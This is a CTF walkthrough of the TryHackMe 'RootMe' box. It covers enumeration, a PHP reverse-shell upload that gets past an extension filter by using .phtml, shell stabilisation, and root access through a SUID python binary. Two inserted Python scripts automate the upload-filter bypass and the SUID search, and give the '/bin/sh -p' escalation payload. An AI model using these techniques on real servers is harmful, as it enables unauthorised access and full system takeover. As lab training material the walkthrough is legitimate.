RootMe is an easy level box on THM which covers enumeration of the box, obtaining a reverse shell and abusing SUID binaries to escalate our privileges.
All flags found in the write up will be blurred in order to prevent an easy win for the room. Find the room here.
Enumeration
As with every box, we start with an Nmap scan to see what services are running.
From the Nmap results, we can see that we have the following two services running on the box:
- Port 22 (SSH) — OpenSSH 7.6 (Ubuntu)
- Port 80 (HTTP) — Apache httpd 2.4.29
With a web server running on port 80, let’s check out the site:
When a webserver is running on a target, the first thing I like to do is run some kind of directory brute force against the site to see if we can find any interesting directories:
From Gobuster, we can see that there are 5 directories on the site. The two which catch my eye are:
- /uploads
- /panel
Obtaining Remote Access to the Box (Reverse Shell)
Navigating to http://10.10.115.207/panel looks to be some functionality where we can upload files. Whenever I see that a site allows a user to upload a file, the first thing I try is uploading a PHP Reverse Shell.
I will copy the code for the reverse shell to a file on my desktop called shell.php and upload this to the site. The code for the reverse shell can be found here.
Change the IP and port in the script to the IP of your attacking box and the port you want to listen on (choose anything; I go for 9001).
Note that the script does not need to be made executable: the web server hands the file to its PHP interpreter based on the extension, and the execute bit on your local copy is not carried across by the upload anyway. The only thing that matters is that the server treats the uploaded file as PHP.
Now all you need to do is upload the file to the site:
When we try to upload our PHP reverse shell we get an error: the .php extension is not permitted. We have a few options here:
- We could intercept the request with Burp Suite and send it to Intruder to brute force the file extension until the response differs from the rejection message.
- Before we try that, we could try some common alternative PHP extensions by hand. If that fails, we fall back to the first option.
Let’s alter our PHP file from shell.php to shell.phtml and try to upload:
Cool! Our reverse shell uploaded successfully with the .phtml extension. It works because the filter only rejects the literal .php extension, while the Apache PHP module on Ubuntu hands .phtml (and .phar) files to the same PHP handler as .php.
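The manual "try another extension" step above can be scripted. The following is an added example, not code from the original write-up: it POSTs the same payload under a list of alternative PHP extensions and reports the first one the server does not reject. It assumes the /panel form takes a multipart POST with a file field named "file" (an assumption; check the form HTML or a Burp capture for the real field name) and that a rejected upload returns a page containing "not permitted", matching the error the write-up describes; adjust BLOCK_PATTERN if the real message differs.

```python
"""Try alternative PHP extensions against an upload form that rejects .php.

Added example, not code from the original write-up. Assumes the /panel
upload form takes a multipart POST with a file field named "file" and that a
rejected upload returns a page containing "not permitted"; both are
assumptions to confirm against the real form.
"""
import re
import sys
import urllib.error
import urllib.request
import uuid

# Extensions a PHP handler config may map to PHP when only the literal ".php"
# is blocklisted. .phtml is what worked in the write-up; the php3/4/5/7 ones
# depend on the server's handler config.
CANDIDATE_EXTENSIONS = ["phtml", "phar", "php5", "php7", "php4", "php3"]

# Text a rejected upload carries in its response (assumption, see above).
BLOCK_PATTERN = re.compile(r"not permitted", re.IGNORECASE)


def candidate_filenames(basename="shell", extensions=CANDIDATE_EXTENSIONS):
    """Filenames to try, in order."""
    return [f"{basename}.{ext}" for ext in extensions]


def looks_blocked(body):
    """True if the response text carries the rejection message."""
    return BLOCK_PATTERN.search(body) is not None


def build_multipart(field, filename, content, boundary):
    """Hand-roll a multipart/form-data body so the script has no third-party deps."""
    parts = [
        f"--{boundary}",
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"',
        "Content-Type: application/octet-stream",
        "",
        content,
        f"--{boundary}--",
        "",
    ]
    return "\r\n".join(parts).encode()


def multipart_filename(body):
    """Read the filename back out of a body from build_multipart (sanity check)."""
    match = re.search(rb'filename="([^"]+)"', body)
    return match.group(1).decode() if match else None


def probe(url, payload, field="file"):
    """POST the payload under each candidate name; return the first name the
    server does not reject, or None if every extension is blocked."""
    for name in candidate_filenames():
        boundary = uuid.uuid4().hex
        req = urllib.request.Request(
            url, data=build_multipart(field, name, payload, boundary), method="POST"
        )
        req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                text = resp.read().decode(errors="replace")
        except urllib.error.HTTPError:
            continue  # a 4xx/5xx response is treated as a rejection
        if not looks_blocked(text):
            return name
    return None


if __name__ == "__main__":
    # usage: python3 probe_upload.py http://10.10.115.207/panel/ shell.php
    target, shell_path = sys.argv[1], sys.argv[2]
    with open(shell_path) as fh:
        print("accepted:", probe(target, fh.read()))
```

Once a name is accepted, start the netcat listener and request /uploads/<that name> in the browser; a filename being accepted only tells you the filter let it through, not that the server executes it, so the callback is the real confirmation.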
If you remember from our Gobuster scan, there was also a directory on the box called /uploads. Let’s check that out to see if that’s where our Reverse Shell is stored:
Now that we know where our reverse shell is stored, let's use netcat to listen on port 9001 and then request the file in the browser. The server executes the PHP as soon as the file is requested, which is what triggers the callback:
And just like that, we have our reverse shell. When I get access to a box, I like to stabilise the shell to make things easier to navigate on the box. Use the following:
python -c 'import pty; pty.spawn("/bin/bash")'
Now that we have a somewhat stable shell, we can find the user.txt flag using the following:
find / -type f -iname user.txt 2>/dev/null
- -type f : searches regular files only.
- -iname : matches the file name case-insensitively.
- 2>/dev/null : suppresses the permission-denied errors from directories we cannot read.
Abusing SUID Binaries (Privilege Escalation)
Now that we have our initial access on the box and we have found the user.txt flag, we need to find a way to escalate our privileges to root.
Let's see if there are any files on the system whose SUID bit is set and which are owned by the root user. When a file with the SUID bit set is executed, it runs with the effective privileges of the file's owner rather than those of the user running it. So if there is a binary owned by root with the SUID bit set, and that binary can be made to run arbitrary commands, we can use it to elevate our privileges.
To find SUID binaries, we can run the following command:
find / -type f -user root -perm -4000 2>/dev/null
- / : scan the entire filesystem
- -type f : look only for regular files (no directories)
- -user root : match files owned by root
- -perm -4000 : match files that have at least the 4000 bit set. 4000 is the octal representation of the SUID bit; the leading minus means "all of the listed bits must be set" (with a single bit, -perm /4000 matches the same files).
- 2>/dev/null : not required, but it redirects the permission-denied errors find produces to /dev/null, which discards whatever is written to it, so the output only contains hits.
What stands out to me here is that Python has the SUID bit set. Let's search GTFOBins, the best resource whenever we need to abuse a system binary.
A search for python on GTFOBins gives us the following result:
Let's run this in our reverse shell:
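To make the SUID check and the GTFOBins trick concrete, here is an added example (not code from the write-up or from GTFOBins) that does in Python what the find command above does, filters the hits down to binaries worth looking up, and wraps the python SUID payload in a function with an explanation of why the -p flag matters. The GTFO_CANDIDATES list is a short hand-picked set, not a complete one, and the mode/uid values in the test are constructed rather than read from a real box.

```python
"""Find root-owned SUID files and show what the GTFOBins trick for python does.

Added example, not code from the write-up. is_root_suid() mirrors the
find / -type f -user root -perm -4000 test from the text. Runs under
Python 2 or 3, so it can be pasted into the reverse shell on the target.
"""
import os
import stat
import sys

# Any of the three execute bits; a SUID bit on a non-executable file does nothing.
EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH

# Basenames worth looking up on GTFOBins if they turn up SUID (hand-picked, not complete).
GTFO_CANDIDATES = {"python", "python2", "python2.7", "python3", "bash", "find", "vim", "nmap", "env"}


def is_root_suid(mode, uid):
    """True for a regular file owned by uid 0 with the SUID bit set on an executable.
    mode is st_mode, e.g. 0o104755 for -rwsr-xr-x."""
    return (
        stat.S_ISREG(mode)
        and uid == 0
        and bool(mode & stat.S_ISUID)
        and bool(mode & EXEC_BITS)
    )


def find_root_suid(root="/"):
    """Walk the tree from root and yield paths that is_root_suid() accepts.
    Unreadable entries are skipped silently, which is what 2>/dev/null does for find."""
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath in ("/proc", "/sys", "/dev"):
            dirnames[:] = []  # pseudo-filesystems: nothing useful, lots of noise
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_root_suid(st.st_mode, st.st_uid):
                yield path


def gtfobins_hits(paths):
    """Filter a SUID list down to the binaries on the GTFO_CANDIDATES list."""
    return [p for p in paths if os.path.basename(p) in GTFO_CANDIDATES]


def spawn_privileged_shell():
    """The GTFOBins SUID entry for python, as a function: replace the current
    process with /bin/sh -p. It only yields root when the interpreter running
    it is the SUID python (effective uid 0); -p stops sh from resetting the
    effective uid back to the real uid, which it does by default when the two
    differ. One-liner form for the reverse shell:
        /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
    """
    os.execl("/bin/sh", "sh", "-p")


if __name__ == "__main__":
    hits = list(find_root_suid(sys.argv[1] if len(sys.argv) > 1 else "/"))
    print("\n".join(hits))
    print("look these up on GTFOBins: " + ", ".join(gtfobins_hits(hits)))
```

The one-liner in the docstring is the whole privilege escalation: because the SUID bit makes the python process run with euid 0, the sh it execs inherits that, and -p keeps it. Without -p you get a shell that has quietly dropped back to your own uid, which is a common reason this step "does not work".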
And just like that, we now have root access and are able to read the root.txt flag.
Now, the box is completed… Rooted ;). This is my first write-up of any kind of CTF, so please feel free to leave me some feedback!
Happy Hacking! :)